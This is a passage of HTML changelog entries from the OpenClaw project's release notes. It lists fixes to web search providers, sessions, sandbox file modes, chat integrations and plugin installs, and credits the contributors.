<li>Web search/config: validate explicit <code>tools.web.search.provider</code> values against bundled and installed plugin manifests, while warning for stale third-party plugin config. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123070790" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53092" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53092/hovercard" href="https://github.com/openclaw/openclaw/issues/53092">#53092</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</li>
<li>Web search/SearXNG: retry empty non-general category searches once with the general category, so unsupported category engines do not return empty results when general search has matches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343014523" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73552" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73552/hovercard" href="https://github.com/openclaw/openclaw/issues/73552">#73552</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loukky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loukky">@Loukky</a>.</li>
<li>CLI/message: skip gateway-stop hooks for read-only <code>message read</code> and bound stop-hook shutdown for other message actions, so one-shot Discord reads cannot hang behind plugin lifecycle cleanup.</li>
<li>Plugins/web-provider: cache repeated bundled web search and web fetch provider registry loads by default while preserving explicit cache opt-outs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368302945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75992" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75992/hovercard" href="https://github.com/openclaw/openclaw/pull/75992">#75992</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</li>
<li>Agents/sandbox: preserve existing workspace file modes when sandbox edits atomically replace files, so 0644 files do not collapse to 0600 after Write/Edit/apply_patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4064748597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44077" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44077/hovercard" href="https://github.com/openclaw/openclaw/issues/44077">#44077</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/patosullivan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/patosullivan">@patosullivan</a>.</li>
<li>Control UI/WebChat: route typed <code>/new</code> through the New Chat dashboard-session creation flow instead of <code>chat.send</code>, while keeping <code>/reset</code> as the explicit current-session reset. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300356598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69599" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69599/hovercard" href="https://github.com/openclaw/openclaw/issues/69599">#69599</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>Agents/models: keep legacy CLI runtime model refs such as <code>claude-cli/*</code> in the configured allowlist after canonical runtime migration, so cron <code>payload.model</code> overrides keep working. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365669096" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75753/hovercard" href="https://github.com/openclaw/openclaw/issues/75753">#75753</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RyanSandoval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RyanSandoval">@RyanSandoval</a>.</li>
<li>Codex/app-server: restart the shared Codex app-server client once when it closes during startup thread resume, preserving the existing thread binding instead of retrying <code>thread/start</code> on a closed client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/watch: keep colored subsystem log prefixes in the managed tmux pane even when the parent shell exports <code>NO_COLOR</code>, while preserving explicit <code>FORCE_COLOR=0</code> opt-out. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/compaction: submit a non-empty runtime-event marker for pre-compaction memory flush turns, so strict Anthropic providers no longer reject the silent flush as an empty user message. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361911066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75305" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75305/hovercard" href="https://github.com/openclaw/openclaw/issues/75305">#75305</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sableassistant3777-source/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sableassistant3777-source">@sableassistant3777-source</a>.</li>
<li>Plugin SDK: re-export <code>isPrivateIpAddress</code> from <code>plugin-sdk/ssrf-runtime</code>, restoring source-checkout builds for SearXNG and Firecrawl private-network guards. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord/message actions: advertise <code>upload-file</code> and route it through Discord's send runtime with agent-scoped media reads, so agents can discover and send file attachments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203171087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60652/hovercard" href="https://github.com/openclaw/openclaw/issues/60652">#60652</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204560464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60808" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60808/hovercard" href="https://github.com/openclaw/openclaw/pull/60808">#60808</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206054244" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61087" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61087/hovercard" href="https://github.com/openclaw/openclaw/pull/61087">#61087</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206088150" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61100" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61100/hovercard" href="https://github.com/openclaw/openclaw/pull/61100">#61100</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/claw-io/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/claw-io">@claw-io</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelnishanth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelnishanth">@joelnishanth</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjhddh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjhddh">@sjhddh</a>.</li>
<li>Sessions: suppress exact inter-session control replies such as <code>NO_REPLY</code> and keep agent-to-agent announce bookkeeping out of visible transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123622416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53145" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53145/hovercard" href="https://github.com/openclaw/openclaw/issues/53145">#53145</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TarahAssistant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TarahAssistant">@TarahAssistant</a>.</li>
<li>CLI/directory: report unsupported directory operations for installed channel plugins instead of prompting to reinstall the plugin when it lacks a directory adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365917479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75770" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75770/hovercard" href="https://github.com/openclaw/openclaw/issues/75770">#75770</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lawong888/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lawong888">@lawong888</a>.</li>
<li>Web search/SearXNG/Firecrawl/Kimi: show the SearXNG JSON API <code>search.formats</code> prerequisite, pass through <code>img_src</code> image URLs, fail explicitly when Kimi returns ungrounded answers, keep public provider requests on strict SSRF guards, reject private/loopback/metadata/non-HTTP(S) hosted Firecrawl scrape targets, and allow explicit self-hosted private Firecrawl endpoints. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117727594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52573/hovercard" href="https://github.com/openclaw/openclaw/issues/52573">#52573</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350921258" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74357" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74357/hovercard" href="https://github.com/openclaw/openclaw/issues/74357">#74357</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4234128169" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63877/hovercard" href="https://github.com/openclaw/openclaw/issues/63877">#63877</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250289649" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65592" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65592/hovercard" href="https://github.com/openclaw/openclaw/pull/65592">#65592</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207995751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61416" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61416/hovercard" href="https://github.com/openclaw/openclaw/pull/61416">#61416</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350976183" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74360/hovercard" href="https://github.com/openclaw/openclaw/pull/74360">#74360</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4081587848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48133" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48133/hovercard" href="https://github.com/openclaw/openclaw/pull/48133">#48133</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4194271236" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59666" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59666/hovercard" href="https://github.com/openclaw/openclaw/pull/59666">#59666</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235261313" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63941" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63941/hovercard" href="https://github.com/openclaw/openclaw/pull/63941">#63941</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347547141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74013" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74013/hovercard" href="https://github.com/openclaw/openclaw/pull/74013">#74013</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evanpaul14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evanpaul14">@evanpaul14</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sghael/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sghael">@sghael</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wangwllu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wangwllu">@wangwllu</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kn1ghtc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kn1ghtc">@kn1ghtc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jhthompson12/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jhthompson12">@jhthompson12</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jzakirov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jzakirov">@jzakirov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mlightsnow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mlightsnow">@Mlightsnow</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shad0wca7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shad0wca7">@shad0wca7</a>.</li>
<li>CLI/models: report gateway model fallback attempts in <code>infer model run --json</code> and avoid double-prefixing provider-qualified defaults such as <code>openrouter/auto</code> in <code>models status</code>. Partially fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299726655" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69527" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69527/hovercard" href="https://github.com/openclaw/openclaw/issues/69527">#69527</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexifra/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexifra">@alexifra</a>.</li>
<li>Providers/OpenRouter: strip trailing assistant prefill turns from verified OpenRouter Anthropic model requests when reasoning is enabled, so Claude 4.6 routes no longer fail with Anthropic's prefill rejection through the OpenAI-compatible adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362626247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75395" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75395/hovercard" href="https://github.com/openclaw/openclaw/issues/75395">#75395</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sbmilburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sbmilburn">@sbmilburn</a>.</li>
<li>Voice Call: add per-number inbound routing for dialed-number greetings, response agents/models/prompts, and TTS voice overrides. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161590255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56604" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56604/hovercard" href="https://github.com/openclaw/openclaw/issues/56604">#56604</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/healthstatus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/healthstatus">@healthstatus</a>.</li>
<li>Feishu: preserve Feishu/Lark HTTP error bodies for message sends, media sends, and chat member lookups, so HTTP 400 failures include vendor code, message, log id, and troubleshooter details. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346852455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73860" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73860/hovercard" href="https://github.com/openclaw/openclaw/issues/73860">#73860</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/desksk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/desksk">@desksk</a>.</li>
<li>Agents/transcripts: avoid reopening large Pi transcript files through the synchronous session manager for maintenance rewrites, persisted tool-result truncation, manual compaction boundary hardening, and queued compaction rotation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</li>
<li>Web search/Exa/MiniMax: accept Exa <code>webSearch.baseUrl</code> overrides with endpoint-partitioned caches, include MiniMax Search in setup, and let <code>MINIMAX_API_KEY</code> participate in MiniMax Search auto-detection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140768584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54928" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54928/hovercard" href="https://github.com/openclaw/openclaw/issues/54928">#54928</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140867375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54939" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54939/hovercard" href="https://github.com/openclaw/openclaw/pull/54939">#54939</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252993330" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65828" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65828/hovercard" href="https://github.com/openclaw/openclaw/pull/65828">#65828</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrpl327/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrpl327">@mrpl327</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lyfuci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lyfuci">@lyfuci</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</li>
<li>Plugins/ClawHub: preserve official source-linked trust through archive installs, so OpenClaw can install trusted ClawHub plugin packages that trigger the built-in dangerous-pattern scanner. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/ClawHub: install package runtime dependencies for archive-backed plugin installs, so ClawHub packages such as WhatsApp load declared dependencies after download. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/tools: cache repeated plugin tool factory results only for matching request context, reducing per-turn tool prep without leaking sandbox, session, browser, delivery, or runtime config state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367960262" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75956/hovercard" href="https://github.com/openclaw/openclaw/issues/75956">#75956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</li>
<li>Providers/LM Studio: allow <code>models.providers.lmstudio.params.preload: false</code> to skip OpenClaw's native model-load call so LM Studio JIT loading, idle TTL, and auto-evict can own model lifecycle. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367728807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75921" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75921/hovercard" href="https://github.com/openclaw/openclaw/issues/75921">#75921</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/garyd9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/garyd9">@garyd9</a>.</li>
<li>Agents/transcripts: keep chat history, restart recovery, fork token checks, and stale-token compaction checks on bounded async transcript reads or cached async indexes instead of reparsing large session files. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</li>
<li>Telegram: inherit the process DNS result order for Bot API transport and downgrade recovered sticky IPv4 fallback promotions to debug logs, while keeping pinned-IP escalation warnings visible. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367563919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75904" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75904/hovercard" href="https://github.com/openclaw/openclaw/issues/75904">#75904</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/highfly-hi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/highfly-hi">@highfly-hi</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Sessions: keep durable external conversation pointers, including group and thread-scoped chat sessions, out of age, count, and disk-budget maintenance eviction while still allowing synthetic runtime entries to age out. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175356638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58088/hovercard" href="https://github.com/openclaw/openclaw/issues/58088">#58088</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drinkflav/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drinkflav">@drinkflav</a>.</li>
<li>Web search/Providers MiniMax: allow <code>MINIMAX_OAUTH_TOKEN</code> to satisfy MiniMax Search credentials and derive Coding Plan usage polling from the configured MiniMax base URL, so OAuth-authorized and global setups use the right endpoint. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252008941" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65768" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65768/hovercard" href="https://github.com/openclaw/openclaw/issues/65768">#65768</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246049228" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65054/hovercard" href="https://github.com/openclaw/openclaw/issues/65054">#65054</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kikibrian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kikibrian">@kikibrian</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhouhe-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhouhe-xydt">@zhouhe-xydt</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sixone74/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sixone74">@sixone74</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Yanhu007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Yanhu007">@Yanhu007</a>.</li>
<li>Control UI/WebChat: skip assistant-media transcript supplements when stale media refs resolve to no playable media, so text-only final replies are not stored a second time as gateway-injected assistant messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347391100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73956/hovercard" href="https://github.com/openclaw/openclaw/issues/73956">#73956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</li>
<li>Sessions: reject <code>sessions_send</code> targets that resolve to thread-scoped chat sessions, so inter-agent coordination cannot be injected into active human-facing Slack or Discord threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117274546" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52496" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52496/hovercard" href="https://github.com/openclaw/openclaw/issues/52496">#52496</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barry-p5cc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barry-p5cc">@barry-p5cc</a>.</li>
<li>Subagents: honor <code>sessions_spawn</code> with <code>expectsCompletionMessage: false</code> by skipping parent completion handoff delivery while still running child cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367072418" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75848/hovercard" href="https://github.com/openclaw/openclaw/issues/75848">#75848</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alfredjbclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alfredjbclaw">@alfredjbclaw</a>.</li>
<li>Media/completions: treat media-only message-tool sends as delivered async completion output, avoiding duplicate raw <code>MEDIA:</code> fallback posts after video or music generation finishes.</li>
<li>Gateway/logging: keep deferred channel startup logs on the subsystem logger, so Slack, Discord, Telegram, and voice-call startup messages keep timestamped prefixes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex/app-server: recover JSON-RPC frames split by raw command-output newlines and include a redacted preview when malformed app-server messages still reach the console. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Replies/typing: keep typing alive for queued follow-up messages that are genuinely waiting behind an active run, instead of making chat surfaces look idle while work is queued. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251046189" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65685" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65685/hovercard" href="https://github.com/openclaw/openclaw/issues/65685">#65685</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/papag00se/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/papag00se">@papag00se</a>.</li>
<li>ACP/Discord: suppress completion announce delivery for inline thread-bound ACP session runs, so Discord thread-bound ACP replies are not delivered twice. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204352483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60780" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60780/hovercard" href="https://github.com/openclaw/openclaw/issues/60780">#60780</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solavrc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solavrc">@solavrc</a>.</li>
